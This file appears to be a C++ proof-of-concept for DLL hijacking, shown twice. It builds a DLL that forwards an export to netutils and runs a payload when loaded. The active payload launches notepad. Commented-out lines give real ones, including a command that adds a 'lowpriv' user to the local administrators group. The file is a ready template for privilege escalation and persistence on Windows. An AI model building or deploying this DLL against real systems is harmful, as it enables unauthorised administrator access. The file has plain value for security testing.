thesubtlety/dllmain.cpp

## dllmain.cpp
// Configuration Type: DLL
// Runtime Library: /MT
// Use of MFC: Use MFC in Static Library
// Architecture must match target _process_

// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include <windows.h>
#include <sstream>

#pragma once
#pragma comment(linker, "/export:SfcGetFiles=C:\\Windows\\System32\\netutils.NetApiBufferAllocate,@1")

using namespace std;

void exec() {
	// WinExec("net localgroup administrators lowpriv /add", 0);
	// WinExec("cmd.exe /c whoami > c:\\whoami.txt", 0);
	// WinExec("cmd \"d:some path\\program.bat\" \"d:\\other path\\file name.ext\"", SW_SHOW_MINIMIZED);

	STARTUPINFO				startupInfo;
	PROCESS_INFORMATION		processInfo;

	ZeroMemory(&startupInfo, sizeof(startupInfo));
	startupInfo.cb = sizeof(startupInfo);
	ZeroMemory(&processInfo, sizeof(processInfo));

	std::wostringstream s;
	s << L"C:\\Windows\\notepad.exe";
	std::wstring cmdLine = s.str();

	GetStartupInfoW(&startupInfo);
	if (!CreateProcessW(NULL, &cmdLine[0], NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo)
		)
	{
		printf("CreateProcess failed (%d) \n", GetLastError());
	}
	WaitForSingleObject(processInfo.hProcess, 300);
	CloseHandle(processInfo.hProcess);
	CloseHandle(processInfo.hThread);
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		exec();
		break;

	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

//rundll32 out.dll,0
extern "C" __declspec(dllexport) void test()
{
	exec();
}
	// Configuration Type: DLL
	// Runtime Library: /MT
	// Use of MFC: Use MFC in Static Library
	// Architecture must match target _process_

	// dllmain.cpp : Defines the entry point for the DLL application.
	#include "stdafx.h"
	#include <windows.h>
	#include <sstream>

	#pragma once
	#pragma comment(linker, "/export:SfcGetFiles=C:\\Windows\\System32\\netutils.NetApiBufferAllocate,@1")

	using namespace std;

	void exec() {
	// WinExec("net localgroup administrators lowpriv /add", 0);
	// WinExec("cmd.exe /c whoami > c:\\whoami.txt", 0);
	// WinExec("cmd \"d:some path\\program.bat\" \"d:\\other path\\file name.ext\"", SW_SHOW_MINIMIZED);

	STARTUPINFO startupInfo;
	PROCESS_INFORMATION processInfo;

	ZeroMemory(&startupInfo, sizeof(startupInfo));
	startupInfo.cb = sizeof(startupInfo);
	ZeroMemory(&processInfo, sizeof(processInfo));

	std::wostringstream s;
	s << L"C:\\Windows\\notepad.exe";
	std::wstring cmdLine = s.str();

	GetStartupInfoW(&startupInfo);
	if (!CreateProcessW(NULL, &cmdLine[0], NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo)
	)
	{
	printf("CreateProcess failed (%d) \n", GetLastError());
	}
	WaitForSingleObject(processInfo.hProcess, 300);
	CloseHandle(processInfo.hProcess);
	CloseHandle(processInfo.hThread);
	}

	BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	)
	{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	exec();
	break;

	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
	}

	//rundll32 out.dll,0
	extern "C" __declspec(dllexport) void test()
	{
	exec();
	}